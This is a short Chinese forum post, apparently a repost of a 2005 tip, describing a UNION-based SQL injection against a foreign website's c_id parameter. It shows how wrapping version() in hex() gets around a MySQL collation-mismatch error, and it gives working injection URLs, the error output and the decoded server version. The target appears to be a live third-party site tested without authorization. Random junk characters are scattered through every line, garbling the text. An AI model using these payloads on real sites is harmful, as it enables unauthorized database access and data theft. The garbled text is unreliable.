本文作者:SuperHei9 X& \, Y! q/ f5 V! w
文章性质:原创2 S5 L/ J9 e* I' R
发布日期:2005-10-18
- X/ ^. H1 P' c1 z4 k$ K/ ^测试个国外的站时:
* r# |* B; E8 ]url:?c_id=2%20and%201=2%20union%20select%201,version(),3,4,5,6%20/*
* J0 M1 k, S. A1 {; O返回错误:$ l: q! D0 ?' _3 Z7 S
Illegal mix of collations (euckr_korean_ci,IMPLICIT) and (utf8_general_ci,IMPLICIT) for operation 'UNION'$ v Z" E0 v* y* F, N6 @ o
MySQL Error No. 126
# N; R' ^' T0 T# U( H! C- J' }" c3 O看来是union查询前后字符集(http://dev.mysql.com/doc/mysql/en/Charset-collation-charset.html)不同出现的。/ p* L# p6 a# B, ~& K
解决办法:转为其他编码如hex。# `' t A( P& f% v6 \. o. S
url:?c_id=2%20and%201=2%20union%20select%201,hex(version()),3,4,5,6%20/*
" l) u# r0 P) H, m# {8 D成功得到hex(version())的值为:
0 c) E4 {/ c; M- c( Y' {' E V) `1 T8 k342E312E332D62657461' D) J7 q* i( W, O
回Mysql查询下得到:" p9 l! E& l. s
mysql> select 0x342E312E332D62657461;
# @& ]( X3 J' J @+------------------------+
: Q& x x p; @/ s' j& h| 0x342E312E332D62657461 |# Q- d3 _, Y% f
+------------------------+
+ Y8 y8 F. A0 K7 w| 4.1.3-beta |
* ?) f3 W; w$ q {- {& u# {/ ]+------------------------+( H& o- }4 ^& m5 {0 ]" p* h- V
1 row in set (0.00 sec)
/ B6 s6 l6 i) T" Z* ]$ d
% Z$ s2 S9 X2 s/ o1 U |
发表于 2012-9-15 14:04:54
收藏
支持
反对